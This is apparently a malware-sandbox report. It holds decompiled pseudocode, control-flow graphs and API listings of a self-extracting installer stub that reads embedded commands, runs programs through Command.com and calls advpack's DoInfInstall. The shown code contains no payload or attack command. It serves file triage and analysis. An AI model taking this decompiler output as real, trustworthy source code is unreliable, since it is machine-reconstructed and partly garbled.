                            control_flow_graph 36 eb3ba2-eb3bd9 37 eb3bdb-eb3bee call eb468f 36->37 38 eb3bfd-eb3bff 36->38 46 eb3d13-eb3d30 call eb44b9 37->46 47 eb3bf4-eb3bf7 37->47 39 eb3c03-eb3c28 memset 38->39 41 eb3c2e-eb3c40 call eb468f 39->41 42 eb3d35-eb3d48 call eb1781 39->42 41->46 53 eb3c46-eb3c49 41->53 48 eb3d4d-eb3d52 42->48 58 eb3f4d 46->58 47->38 47->46 51 eb3d9e-eb3db6 call eb1ae8 48->51 52 eb3d54-eb3d6c call eb468f 48->52 51->58 69 eb3dbc-eb3dc2 51->69 52->46 65 eb3d6e-eb3d75 52->65 53->46 56 eb3c4f-eb3c56 53->56 61 eb3c58-eb3c5e 56->61 62 eb3c60-eb3c65 56->62 59 eb3f4f-eb3f63 call eb6ce0 58->59 66 eb3c6e-eb3c73 61->66 67 eb3c67-eb3c6d 62->67 68 eb3c75-eb3c7c 62->68 71 eb3d7b-eb3d98 CompareStringA 65->71 72 eb3fda-eb3fe1 65->72 73 eb3c87-eb3c89 66->73 67->66 68->73 76 eb3c7e-eb3c82 68->76 74 eb3de6-eb3de8 69->74 75 eb3dc4-eb3dce 69->75 71->51 71->72 79 eb3fe8-eb3fea 72->79 80 eb3fe3 call eb2267 72->80 73->48 82 eb3c8f-eb3c98 73->82 77 eb3f0b-eb3f15 call eb3fef 74->77 78 eb3dee-eb3df5 74->78 75->74 81 eb3dd0-eb3dd7 75->81 76->73 94 eb3f1a-eb3f1c 77->94 83 eb3fab-eb3fd2 call eb44b9 LocalFree 78->83 84 eb3dfb-eb3dfd 78->84 79->59 80->79 81->74 87 eb3dd9-eb3ddb 81->87 88 eb3c9a-eb3c9c 82->88 89 eb3cf1-eb3cf3 82->89 83->58 84->77 92 eb3e03-eb3e0a 84->92 87->78 95 eb3ddd-eb3de1 call eb202a 87->95 90 eb3c9e-eb3ca3 88->90 91 eb3ca5-eb3ca7 88->91 89->51 93 eb3cf9-eb3d11 call eb468f 89->93 98 eb3cb2-eb3cc5 call eb468f 90->98 91->58 99 eb3cad 91->99 92->77 100 eb3e10-eb3e19 call eb6495 92->100 93->46 93->48 102 eb3f1e-eb3f2d LocalFree 94->102 103 eb3f46-eb3f47 LocalFree 94->103 95->74 98->46 112 eb3cc7-eb3ce8 CompareStringA 98->112 99->98 113 eb3e1f-eb3e36 GetProcAddress 100->113 114 eb3f92-eb3fa9 call eb44b9 100->114 108 eb3f33-eb3f3b 102->108 109 eb3fd7-eb3fd9 102->109 103->58 108->39 109->72 112->89 115 eb3cea-eb3ced 112->115 116 eb3e3c-eb3e80 113->116 117 eb3f64-eb3f76 call eb44b9 FreeLibrary 113->117 126 eb3f7c-eb3f90 LocalFree call eb6285 114->126 115->89 120 eb3e8b-eb3e94 116->120 121 eb3e82-eb3e87 116->121 117->126 124 eb3e9f-eb3ea2 120->124 125 eb3e96-eb3e9b 120->125 121->120 128 eb3ead-eb3eb6 124->128 129 eb3ea4-eb3ea9 124->129 125->124 126->58 131 eb3eb8-eb3ebd 128->131 132 eb3ec1-eb3ec3 128->132 129->128 131->132 133 eb3ece-eb3eec 132->133 134 eb3ec5-eb3eca 132->134 137 eb3eee-eb3ef3 133->137 138 eb3ef5-eb3efd 133->138 134->133 137->138 139 eb3eff-eb3f09 FreeLibrary 138->139 140 eb3f40 FreeLibrary 138->140 139->102 140->103
                            C-Code - Quality: 82%
                            			E00EB3BA2() {
                            				signed int _v8;
                            				signed int _v12;
                            				char _v276;
                            				char _v280;
                            				short _v300;
                            				intOrPtr _v304;
                            				void _v348;
                            				char _v352;
                            				intOrPtr _v356;
                            				signed int _v360;
                            				short _v364;
                            				char* _v368;
                            				intOrPtr _v372;
                            				void* _v376;
                            				intOrPtr _v380;
                            				char _v384;
                            				signed int _v388;
                            				intOrPtr _v392;
                            				signed int _v396;
                            				signed int _v400;
                            				signed int _v404;
                            				void* _v408;
                            				void* _v424;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t69;
                            				signed int _t76;
                            				void* _t77;
                            				signed int _t79;
                            				short _t96;
                            				signed int _t97;
                            				intOrPtr _t98;
                            				signed int _t101;
                            				signed int _t104;
                            				signed int _t108;
                            				int _t112;
                            				void* _t115;
                            				signed char _t118;
                            				void* _t125;
                            				signed int _t127;
                            				void* _t128;
                            				struct HINSTANCE__* _t129;
                            				void* _t130;
                            				short _t137;
                            				char* _t140;
                            				signed char _t144;
                            				signed char _t145;
                            				signed int _t149;
                            				void* _t150;
                            				void* _t151;
                            				signed int _t153;
                            				void* _t155;
                            				void* _t156;
                            				signed int _t157;
                            				signed int _t162;
                            				signed int _t164;
                            				void* _t165;
                            
                            				_t164 = (_t162 & 0xfffffff8) - 0x194;
                            				_t69 =  *0xeb8004; // 0x92ae1240
                            				_v8 = _t69 ^ _t164;
                            				_t153 = 0;
                            				 *0xeb9124 =  *0xeb9124 & 0;
                            				_t149 = 0;
                            				_v388 = 0;
                            				_v384 = 0;
                            				_t165 =  *0xeb8a28 - _t153; // 0x0
                            				if(_t165 != 0) {
                            					L3:
                            					_t127 = 0;
                            					_v392 = 0;
                            					while(1) {
                            						_v400 = _v400 & 0x00000000;
                            						memset( &_v348, 0, 0x44);
                            						_t164 = _t164 + 0xc;
                            						_v348 = 0x44;
                            						if( *0xeb8c42 != 0) {
                            							goto L26;
                            						}
                            						_t146 =  &_v396;
                            						_t115 = E00EB468F("SHOWWINDOW",  &_v396, 4);
                            						if(_t115 == 0 || _t115 > 4) {
                            							L25:
                            							_t146 = 0x4b1;
                            							E00EB44B9(0, 0x4b1, 0, 0, 0x10, 0);
                            							 *0xeb9124 = 0x80070714;
                            							goto L62;
                            						} else {
                            							if(_v396 != 1) {
                            								__eflags = _v396 - 2;
                            								if(_v396 != 2) {
                            									_t137 = 3;
                            									__eflags = _v396 - _t137;
                            									if(_v396 == _t137) {
                            										_v304 = 1;
                            										_v300 = _t137;
                            									}
                            									goto L14;
                            								}
                            								_push(6);
                            								_v304 = 1;
                            								_pop(0);
                            								goto L11;
                            							} else {
                            								_v304 = 1;
                            								L11:
                            								_v300 = 0;
                            								L14:
                            								if(_t127 != 0) {
                            									L27:
                            									_t155 = 1;
                            									__eflags = _t127 - 1;
                            									if(_t127 != 1) {
                            										L31:
                            										_t132 =  &_v280;
                            										_t76 = E00EB1AE8( &_v280,  &_v408,  &_v404); // executed
                            										__eflags = _t76;
                            										if(_t76 == 0) {
                            											L62:
                            											_t77 = 0;
                            											L63:
                            											_pop(_t150);
                            											_pop(_t156);
                            											_pop(_t128);
                            											return E00EB6CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                            										}
                            										_t157 = _v404;
                            										__eflags = _t149;
                            										if(_t149 != 0) {
                            											L37:
                            											__eflags = _t157;
                            											if(_t157 == 0) {
                            												L57:
                            												_t151 = _v408;
                            												_t146 =  &_v352;
                            												_t130 = _t151; // executed
                            												_t79 = E00EB3FEF(_t130,  &_v352); // executed
                            												__eflags = _t79;
                            												if(_t79 == 0) {
                            													L61:
                            													LocalFree(_t151);
                            													goto L62;
                            												}
                            												L58:
                            												LocalFree(_t151);
                            												_t127 = _t127 + 1;
                            												_v396 = _t127;
                            												__eflags = _t127 - 2;
                            												if(_t127 >= 2) {
                            													_t155 = 1;
                            													__eflags = 1;
                            													L69:
                            													__eflags =  *0xeb8580;
                            													if( *0xeb8580 != 0) {
                            														E00EB2267();
                            													}
                            													_t77 = _t155;
                            													goto L63;
                            												}
                            												_t153 = _v392;
                            												_t149 = _v388;
                            												continue;
                            											}
                            											L38:
                            											__eflags =  *0xeb8180;
                            											if( *0xeb8180 == 0) {
                            												_t146 = 0x4c7;
                            												E00EB44B9(0, 0x4c7, 0, 0, 0x10, 0);
                            												LocalFree(_v424);
                            												 *0xeb9124 = 0x8007042b;
                            												goto L62;
                            											}
                            											__eflags = _t157;
                            											if(_t157 == 0) {
                            												goto L57;
                            											}
                            											__eflags =  *0xeb9a34 & 0x00000004;
                            											if(__eflags == 0) {
                            												goto L57;
                            											}
                            											_t129 = E00EB6495(_t127, _t132, _t157, __eflags);
                            											__eflags = _t129;
                            											if(_t129 == 0) {
                            												_t146 = 0x4c8;
                            												E00EB44B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                            												L65:
                            												LocalFree(_v408);
                            												 *0xeb9124 = E00EB6285();
                            												goto L62;
                            											}
                            											_t146 = GetProcAddress(_t129, "DoInfInstall");
                            											_v404 = _t146;
                            											__eflags = _t146;
                            											if(_t146 == 0) {
                            												_t146 = 0x4c9;
                            												__eflags = 0;
                            												E00EB44B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                            												FreeLibrary(_t129);
                            												goto L65;
                            											}
                            											__eflags =  *0xeb8a30;
                            											_t151 = _v408;
                            											_v384 = 0;
                            											_v368 =  &_v280;
                            											_t96 =  *0xeb9a40; // 0x3
                            											_v364 = _t96;
                            											_t97 =  *0xeb8a38 & 0x0000ffff;
                            											_v380 = 0xeb9154;
                            											_v376 = _t151;
                            											_v372 = 0xeb91e4;
                            											_v360 = _t97;
                            											if( *0xeb8a30 != 0) {
                            												_t97 = _t97 | 0x00010000;
                            												__eflags = _t97;
                            												_v360 = _t97;
                            											}
                            											_t144 =  *0xeb9a34; // 0x1
                            											__eflags = _t144 & 0x00000008;
                            											if((_t144 & 0x00000008) != 0) {
                            												_t97 = _t97 | 0x00020000;
                            												__eflags = _t97;
                            												_v360 = _t97;
                            											}
                            											__eflags = _t144 & 0x00000010;
                            											if((_t144 & 0x00000010) != 0) {
                            												_t97 = _t97 | 0x00040000;
                            												__eflags = _t97;
                            												_v360 = _t97;
                            											}
                            											_t145 =  *0xeb8d48; // 0x0
                            											__eflags = _t145 & 0x00000040;
                            											if((_t145 & 0x00000040) != 0) {
                            												_t97 = _t97 | 0x00080000;
                            												__eflags = _t97;
                            												_v360 = _t97;
                            											}
                            											__eflags = _t145;
                            											if(_t145 < 0) {
                            												_t104 = _t97 | 0x00100000;
                            												__eflags = _t104;
                            												_v360 = _t104;
                            											}
                            											_t98 =  *0xeb9a38; // 0x0
                            											_v356 = _t98;
                            											_t130 = _t146;
                            											 *0xeba288( &_v384);
                            											_t101 = _v404();
                            											__eflags = _t164 - _t164;
                            											if(_t164 != _t164) {
                            												_t130 = 4;
                            												asm("int 0x29");
                            											}
                            											 *0xeb9124 = _t101;
                            											_push(_t129);
                            											__eflags = _t101;
                            											if(_t101 < 0) {
                            												FreeLibrary();
                            												goto L61;
                            											} else {
                            												FreeLibrary();
                            												_t127 = _v400;
                            												goto L58;
                            											}
                            										}
                            										__eflags =  *0xeb9a40 - 1; // 0x3
                            										if(__eflags == 0) {
                            											goto L37;
                            										}
                            										__eflags =  *0xeb8a20;
                            										if( *0xeb8a20 == 0) {
                            											goto L37;
                            										}
                            										__eflags = _t157;
                            										if(_t157 != 0) {
                            											goto L38;
                            										}
                            										_v388 = 1;
                            										E00EB202A(_t146); // executed
                            										goto L37;
                            									}
                            									_t146 =  &_v280;
                            									_t108 = E00EB468F("POSTRUNPROGRAM",  &_v280, 0x104);
                            									__eflags = _t108;
                            									if(_t108 == 0) {
                            										goto L25;
                            									}
                            									__eflags =  *0xeb8c42;
                            									if( *0xeb8c42 != 0) {
                            										goto L69;
                            									}
                            									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                            									__eflags = _t112 == 0;
                            									if(_t112 == 0) {
                            										goto L69;
                            									}
                            									goto L31;
                            								}
                            								_t118 =  *0xeb8a38; // 0x0
                            								if(_t118 == 0) {
                            									L23:
                            									if(_t153 != 0) {
                            										goto L31;
                            									}
                            									_t146 =  &_v276;
                            									if(E00EB468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                            										goto L27;
                            									}
                            									goto L25;
                            								}
                            								if((_t118 & 0x00000001) == 0) {
                            									__eflags = _t118 & 0x00000002;
                            									if((_t118 & 0x00000002) == 0) {
                            										goto L62;
                            									}
                            									_t140 = "USRQCMD";
                            									L20:
                            									_t146 =  &_v276;
                            									if(E00EB468F(_t140,  &_v276, 0x104) == 0) {
                            										goto L25;
                            									}
                            									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                            										_t153 = 1;
                            										_v388 = 1;
                            									}
                            									goto L23;
                            								}
                            								_t140 = "ADMQCMD";
                            								goto L20;
                            							}
                            						}
                            						L26:
                            						_push(_t130);
                            						_t146 = 0x104;
                            						E00EB1781( &_v276, 0x104, _t130, 0xeb8c42);
                            						goto L27;
                            					}
                            				}
                            				_t130 = "REBOOT";
                            				_t125 = E00EB468F(_t130, 0xeb9a2c, 4);
                            				if(_t125 == 0 || _t125 > 4) {
                            					goto L25;
                            				} else {
                            					goto L3;
                            				}
                            			}





























































                            0x00eb3baa
                            0x00eb3bb0
                            0x00eb3bb7
                            0x00eb3bc0
                            0x00eb3bc2
                            0x00eb3bc9
                            0x00eb3bcb
                            0x00eb3bcf
                            0x00eb3bd3
                            0x00eb3bd9
                            0x00eb3bfd
                            0x00eb3bfd
                            0x00eb3bff
                            0x00eb3c03
                            0x00eb3c03
                            0x00eb3c11
                            0x00eb3c16
                            0x00eb3c19
                            0x00eb3c28
                            0x00000000
                            0x00000000
                            0x00eb3c30
                            0x00eb3c39
                            0x00eb3c40
                            0x00eb3d13
                            0x00eb3d15
                            0x00eb3d21
                            0x00eb3d26
                            0x00000000
                            0x00eb3c4f
                            0x00eb3c56
                            0x00eb3c60
                            0x00eb3c65
                            0x00eb3c77
                            0x00eb3c78
                            0x00eb3c7c
                            0x00eb3c7e
                            0x00eb3c82
                            0x00eb3c82
                            0x00000000
                            0x00eb3c7c
                            0x00eb3c67
                            0x00eb3c69
                            0x00eb3c6d
                            0x00000000
                            0x00eb3c58
                            0x00eb3c58
                            0x00eb3c6e
                            0x00eb3c6e
                            0x00eb3c87
                            0x00eb3c89
                            0x00eb3d4d
                            0x00eb3d4f
                            0x00eb3d50
                            0x00eb3d52
                            0x00eb3d9e
                            0x00eb3da8
                            0x00eb3daf
                            0x00eb3db4
                            0x00eb3db6
                            0x00eb3f4d
                            0x00eb3f4d
                            0x00eb3f4f
                            0x00eb3f56
                            0x00eb3f57
                            0x00eb3f58
                            0x00eb3f63
                            0x00eb3f63
                            0x00eb3dbc
                            0x00eb3dc0
                            0x00eb3dc2
                            0x00eb3de6
                            0x00eb3de6
                            0x00eb3de8
                            0x00eb3f0b
                            0x00eb3f0b
                            0x00eb3f0f
                            0x00eb3f13
                            0x00eb3f15
                            0x00eb3f1a
                            0x00eb3f1c
                            0x00eb3f46
                            0x00eb3f47
                            0x00000000
                            0x00eb3f47
                            0x00eb3f1e
                            0x00eb3f1f
                            0x00eb3f25
                            0x00eb3f26
                            0x00eb3f2a
                            0x00eb3f2d
                            0x00eb3fd9
                            0x00eb3fd9
                            0x00eb3fda
                            0x00eb3fda
                            0x00eb3fe1
                            0x00eb3fe3
                            0x00eb3fe3
                            0x00eb3fe8
                            0x00000000
                            0x00eb3fe8
                            0x00eb3f33
                            0x00eb3f37
                            0x00000000
                            0x00eb3f37
                            0x00eb3dee
                            0x00eb3dee
                            0x00eb3df5
                            0x00eb3fad
                            0x00eb3fb9
                            0x00eb3fc2
                            0x00eb3fc8
                            0x00000000
                            0x00eb3fc8
                            0x00eb3dfb
                            0x00eb3dfd
                            0x00000000
                            0x00000000
                            0x00eb3e03
                            0x00eb3e0a
                            0x00000000
                            0x00000000
                            0x00eb3e15
                            0x00eb3e17
                            0x00eb3e19
                            0x00eb3f94
                            0x00eb3fa4
                            0x00eb3f7c
                            0x00eb3f80
                            0x00eb3f8b
                            0x00000000
                            0x00eb3f8b
                            0x00eb3e2c
                            0x00eb3e30
                            0x00eb3e34
                            0x00eb3e36
                            0x00eb3f69
                            0x00eb3f6e
                            0x00eb3f70
                            0x00eb3f76
                            0x00000000
                            0x00eb3f76
                            0x00eb3e3c
                            0x00eb3e43
                            0x00eb3e47
                            0x00eb3e52
                            0x00eb3e56
                            0x00eb3e5c
                            0x00eb3e61
                            0x00eb3e68
                            0x00eb3e70
                            0x00eb3e74
                            0x00eb3e7c
                            0x00eb3e80
                            0x00eb3e82
                            0x00eb3e82
                            0x00eb3e87
                            0x00eb3e87
                            0x00eb3e8b
                            0x00eb3e91
                            0x00eb3e94
                            0x00eb3e96
                            0x00eb3e96
                            0x00eb3e9b
                            0x00eb3e9b
                            0x00eb3e9f
                            0x00eb3ea2
                            0x00eb3ea4
                            0x00eb3ea4
                            0x00eb3ea9
                            0x00eb3ea9
                            0x00eb3ead
                            0x00eb3eb3
                            0x00eb3eb6
                            0x00eb3eb8
                            0x00eb3eb8
                            0x00eb3ebd
                            0x00eb3ebd
                            0x00eb3ec1
                            0x00eb3ec3
                            0x00eb3ec5
                            0x00eb3ec5
                            0x00eb3eca
                            0x00eb3eca
                            0x00eb3ece
                            0x00eb3ed5
                            0x00eb3ed9
                            0x00eb3ee0
                            0x00eb3ee6
                            0x00eb3eea
                            0x00eb3eec
                            0x00eb3eee
                            0x00eb3ef3
                            0x00eb3ef3
                            0x00eb3ef5
                            0x00eb3efa
                            0x00eb3efb
                            0x00eb3efd
                            0x00eb3f40
                            0x00000000
                            0x00eb3eff
                            0x00eb3eff
                            0x00eb3f05
                            0x00000000
                            0x00eb3f05
                            0x00eb3efd
                            0x00eb3dc7
                            0x00eb3dce
                            0x00000000
                            0x00000000
                            0x00eb3dd0
                            0x00eb3dd7
                            0x00000000
                            0x00000000
                            0x00eb3dd9
                            0x00eb3ddb
                            0x00000000
                            0x00000000
                            0x00eb3ddd
                            0x00eb3de1
                            0x00000000
                            0x00eb3de1
                            0x00eb3d59
                            0x00eb3d65
                            0x00eb3d6a
                            0x00eb3d6c
                            0x00000000
                            0x00000000
                            0x00eb3d6e
                            0x00eb3d75
                            0x00000000
                            0x00000000
                            0x00eb3d8f
                            0x00eb3d96
                            0x00eb3d98
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00eb3d98
                            0x00eb3c8f
                            0x00eb3c98
                            0x00eb3cf1
                            0x00eb3cf3
                            0x00000000
                            0x00000000
                            0x00eb3cfe
                            0x00eb3d11
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00eb3d11
                            0x00eb3c9c
                            0x00eb3ca5
                            0x00eb3ca7
                            0x00000000
                            0x00000000
                            0x00eb3cad
                            0x00eb3cb2
                            0x00eb3cb7
                            0x00eb3cc5
                            0x00000000
                            0x00000000
                            0x00eb3ce8
                            0x00eb3cec
                            0x00eb3ced
                            0x00eb3ced
                            0x00000000
                            0x00eb3ce8
                            0x00eb3c9e
                            0x00000000
                            0x00eb3c9e
                            0x00eb3c56
                            0x00eb3d35
                            0x00eb3d35
                            0x00eb3d3c
                            0x00eb3d48
                            0x00000000
                            0x00eb3d48
                            0x00eb3c03
                            0x00eb3be2
                            0x00eb3be7
                            0x00eb3bee
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000

                            APIs
                            • memset.MSVCRT ref: 00EB3C11
                            • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00EB3CDC
                              • Part of subcall function 00EB468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00EB46A0
                              • Part of subcall function 00EB468F: SizeofResource.KERNEL32(00000000,00000000,?,00EB2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46A9
                              • Part of subcall function 00EB468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00EB46C3
                              • Part of subcall function 00EB468F: LoadResource.KERNEL32(00000000,00000000,?,00EB2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46CC
                              • Part of subcall function 00EB468F: LockResource.KERNEL32(00000000,?,00EB2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46D3
                              • Part of subcall function 00EB468F: memcpy_s.MSVCRT ref: 00EB46E5
                              • Part of subcall function 00EB468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46EF
                            • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00EB8C42), ref: 00EB3D8F
                            • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00EB3E26
                            • FreeLibrary.KERNEL32(00000000,?,00EB8C42), ref: 00EB3EFF
                            • LocalFree.KERNEL32(?,?,?,?,00EB8C42), ref: 00EB3F1F
                            • FreeLibrary.KERNEL32(00000000,?,00EB8C42), ref: 00EB3F40
                            • LocalFree.KERNEL32(?,?,?,?,00EB8C42), ref: 00EB3F47
                            • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00EB8C42), ref: 00EB3F76
                            • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00EB8C42), ref: 00EB3F80
                            • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00EB8C42), ref: 00EB3FC2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                            • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$lenta
                            • API String ID: 1032054927-3602275733
                            • Opcode ID: b05e09904c48b77eb10ee8b7d70e043d0044c19939cdde34bada974f47bb8b54
                            • Instruction ID: 9fa9ba203f62364d435825b594cb57dc5275fd44d0181628ae9291b71d445f24
                            • Opcode Fuzzy Hash: b05e09904c48b77eb10ee8b7d70e043d0044c19939cdde34bada974f47bb8b54
                            • Instruction Fuzzy Hash: 3FB1E5706083019FD7209F7599467EBB7E4EB84714F102A2EFA95F62E1DB70C948CB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 141 eb1ae8-eb1b2c call eb1680 144 eb1b3b-eb1b40 141->144 145 eb1b2e-eb1b39 141->145 146 eb1b46-eb1b61 call eb1a84 144->146 145->146 149 eb1b9f-eb1bc2 call eb1781 call eb658a 146->149 150 eb1b63-eb1b65 146->150 157 eb1bc7-eb1bd3 call eb66c8 149->157 152 eb1b68-eb1b6d 150->152 152->152 154 eb1b6f-eb1b74 152->154 154->149 156 eb1b76-eb1b7b 154->156 158 eb1b7d-eb1b81 156->158 159 eb1b83-eb1b86 156->159 166 eb1bd9-eb1bf1 CompareStringA 157->166 167 eb1d73-eb1d7f call eb66c8 157->167 158->159 161 eb1b8c-eb1b9d call eb1680 158->161 159->149 162 eb1b88-eb1b8a 159->162 161->157 162->149 162->161 166->167 168 eb1bf7-eb1c07 GetFileAttributesA 166->168 175 eb1df8-eb1e09 LocalAlloc 167->175 176 eb1d81-eb1d99 CompareStringA 167->176 170 eb1c0d-eb1c15 168->170 171 eb1d53-eb1d5e 168->171 170->171 174 eb1c1b-eb1c33 call eb1a84 170->174 173 eb1d64-eb1d6e call eb44b9 171->173 189 eb1e94-eb1ea4 call eb6ce0 173->189 191 eb1c50-eb1c61 LocalAlloc 174->191 192 eb1c35-eb1c38 174->192 178 eb1e0b-eb1e1b GetFileAttributesA 175->178 179 eb1dd4-eb1ddf 175->179 176->175 181 eb1d9b-eb1da2 176->181 183 eb1e1d-eb1e1f 178->183 184 eb1e67-eb1e73 call eb1680 178->184 179->173 186 eb1da5-eb1daa 181->186 183->184 190 eb1e21-eb1e3e call eb1781 183->190 197 eb1e78-eb1e84 call eb2aac 184->197 186->186 187 eb1dac-eb1db4 186->187 195 eb1db7-eb1dbc 187->195 190->197 211 eb1e40-eb1e43 190->211 191->179 196 eb1c67-eb1c72 191->196 193 eb1c3a 192->193 194 eb1c40-eb1c4b call eb1a84 192->194 193->194 194->191 195->195 201 eb1dbe-eb1dd2 LocalAlloc 195->201 202 eb1c79-eb1cc0 GetPrivateProfileIntA GetPrivateProfileStringA 196->202 203 eb1c74 196->203 210 eb1e89-eb1e92 197->210 201->179 207 eb1de1-eb1df3 call eb171e 201->207 208 eb1cf8-eb1d07 202->208 209 eb1cc2-eb1ccc 202->209 203->202 207->210 216 eb1d09-eb1d21 GetShortPathNameA 208->216 217 eb1d23 208->217 213 eb1cce 209->213 214 eb1cd3-eb1cf3 call eb1680 * 2 209->214 210->189 211->197 215 eb1e45-eb1e65 call eb16b3 * 2 211->215 213->214 214->210 215->197 218 eb1d28-eb1d2b 216->218 217->218 223 eb1d2d 218->223 224 eb1d32-eb1d4e call eb171e 218->224 223->224 224->210
                            C-Code - Quality: 82%
                            			E00EB1AE8(long __ecx, CHAR** _a4, int* _a8) {
                            				signed int _v8;
                            				char _v268;
                            				char _v527;
                            				char _v528;
                            				char _v1552;
                            				CHAR* _v1556;
                            				int* _v1560;
                            				CHAR** _v1564;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t48;
                            				CHAR* _t53;
                            				CHAR* _t54;
                            				char* _t57;
                            				char* _t58;
                            				CHAR* _t60;
                            				void* _t62;
                            				signed char _t65;
                            				intOrPtr _t76;
                            				intOrPtr _t77;
                            				unsigned int _t85;
                            				CHAR* _t90;
                            				CHAR* _t92;
                            				char _t105;
                            				char _t106;
                            				CHAR** _t111;
                            				CHAR* _t115;
                            				intOrPtr* _t125;
                            				void* _t126;
                            				CHAR* _t132;
                            				CHAR* _t135;
                            				void* _t138;
                            				void* _t139;
                            				void* _t145;
                            				intOrPtr* _t146;
                            				char* _t148;
                            				CHAR* _t151;
                            				void* _t152;
                            				CHAR* _t155;
                            				CHAR* _t156;
                            				void* _t157;
                            				signed int _t158;
                            
                            				_t48 =  *0xeb8004; // 0x92ae1240
                            				_v8 = _t48 ^ _t158;
                            				_t108 = __ecx;
                            				_v1564 = _a4;
                            				_v1560 = _a8;
                            				E00EB1680( &_v528, 0x104, __ecx);
                            				if(_v528 != 0x22) {
                            					_t135 = " ";
                            					_t53 =  &_v528;
                            				} else {
                            					_t135 = "\"";
                            					_t53 =  &_v527;
                            				}
                            				_t111 =  &_v1556;
                            				_v1556 = _t53;
                            				_t54 = E00EB1A84(_t111, _t135);
                            				_t156 = _v1556;
                            				_t151 = _t54;
                            				if(_t156 == 0) {
                            					L12:
                            					_push(_t111);
                            					E00EB1781( &_v268, 0x104, _t111, "C:\Users\engineer\AppData\Local\Temp\IXP000.TMP\");
                            					E00EB658A( &_v268, 0x104, _t156);
                            					goto L13;
                            				} else {
                            					_t132 = _t156;
                            					_t148 =  &(_t132[1]);
                            					do {
                            						_t105 =  *_t132;
                            						_t132 =  &(_t132[1]);
                            					} while (_t105 != 0);
                            					_t111 = _t132 - _t148;
                            					if(_t111 < 3) {
                            						goto L12;
                            					}
                            					_t106 = _t156[1];
                            					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                            						if( *_t156 != 0x5c || _t106 != 0x5c) {
                            							goto L12;
                            						} else {
                            							goto L11;
                            						}
                            					} else {
                            						L11:
                            						E00EB1680( &_v268, 0x104, _t156);
                            						L13:
                            						_t138 = 0x2e;
                            						_t57 = E00EB66C8(_t156, _t138);
                            						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                            							_t139 = 0x2e;
                            							_t115 = _t156;
                            							_t58 = E00EB66C8(_t115, _t139);
                            							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                            								_t156 = LocalAlloc(0x40, 0x400);
                            								if(_t156 == 0) {
                            									goto L43;
                            								}
                            								_t65 = GetFileAttributesA( &_v268); // executed
                            								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                            									E00EB1680( &_v1552, 0x400, _t108);
                            								} else {
                            									_push(_t115);
                            									_t108 = 0x400;
                            									E00EB1781( &_v1552, 0x400, _t115,  &_v268);
                            									if(_t151 != 0 &&  *_t151 != 0) {
                            										E00EB16B3( &_v1552, 0x400, " ");
                            										E00EB16B3( &_v1552, 0x400, _t151);
                            									}
                            								}
                            								_t140 = _t156;
                            								 *_t156 = 0;
                            								E00EB2AAC( &_v1552, _t156, _t156);
                            								goto L53;
                            							} else {
                            								_t108 = "Command.com /c %s";
                            								_t125 = "Command.com /c %s";
                            								_t145 = _t125 + 1;
                            								do {
                            									_t76 =  *_t125;
                            									_t125 = _t125 + 1;
                            								} while (_t76 != 0);
                            								_t126 = _t125 - _t145;
                            								_t146 =  &_v268;
                            								_t157 = _t146 + 1;
                            								do {
                            									_t77 =  *_t146;
                            									_t146 = _t146 + 1;
                            								} while (_t77 != 0);
                            								_t140 = _t146 - _t157;
                            								_t154 = _t126 + 8 + _t146 - _t157;
                            								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                            								if(_t156 != 0) {
                            									E00EB171E(_t156, _t154, "Command.com /c %s",  &_v268);
                            									goto L53;
                            								}
                            								goto L43;
